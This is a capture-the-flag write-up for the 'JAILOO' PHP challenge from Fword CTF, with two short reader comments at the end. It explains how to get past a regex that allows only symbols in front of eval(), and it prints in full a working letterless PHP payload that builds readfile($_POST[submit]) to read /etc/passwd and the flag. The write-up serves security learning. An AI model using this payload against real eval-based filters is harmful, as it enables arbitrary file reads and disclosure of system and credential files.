Tags: web
Rating: 1.0
# Writeup JAILOO from fword ctf
We have the source of a php file that allow us execute commands via php eval(), the problem is a regex that only allow a few characters:
```
if(preg_match_all('/^(\$|\(|\)|\_|\[|\]|\=|\;|\+|\"|\.)*$/', $cmd, $matches)){
echo "<div class=\"success\">Command executed !</div>";
eval($cmd);
```
This basically means that we need to create a payload without using letters or numbers, just with ``&"+=()[]``
So let's go I have coded a script that convert strings to that characters using the idea of getting an A and a from a php object like Array. We can get the "A" from index 0 and "a" from index 3.
With that I started with SYSTEM:
But apparently it was not enabled y tried with asset, but it was disabled too.
So I end up using readfile(), As the server requires only 2 arguments I reused the submit variable to send the file I want to read. This means we need a payload like ``readfile($_POST[submit])``.
So let's create the payload I started with readfile:
now _POST :
And finally submit:
Adding alltogether we get our final pyaload:
```
$_="".[];$_=$_[""];$__=("+"=="+");$__=$__+$__+$__;$____="".[];$___=$____[$__];$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$____.=$__;$__=$_;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$____.=$__;$______=$____;$_="".[];$_=$_[""];$__=("+"=="+");$__=$__+$__+$__;$____="".[];$___=$____[$__];$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____=$__;$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$___;$__++;$____.=$__;$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$___;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_______=$____;$_____="_";$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$_____.=$__;$_=$$_____;$______($_[$_______]);
```
We just need to go and try the files we want to read using the POST parameter submit
trying with /etc/passwd:
Getting the flag:
$_POST['submit'] gets stored in $submit before the eval, so you could've skipped a bunch of payload there :) Then again, hardcoding 'FLAG.PHP' is even shorter than 'submit' and skips the need to pass anything in the submit parameter, so you can just copy-paste to the actual form instead of using curl, burp, etc.
where's the payloadgenerator.py?
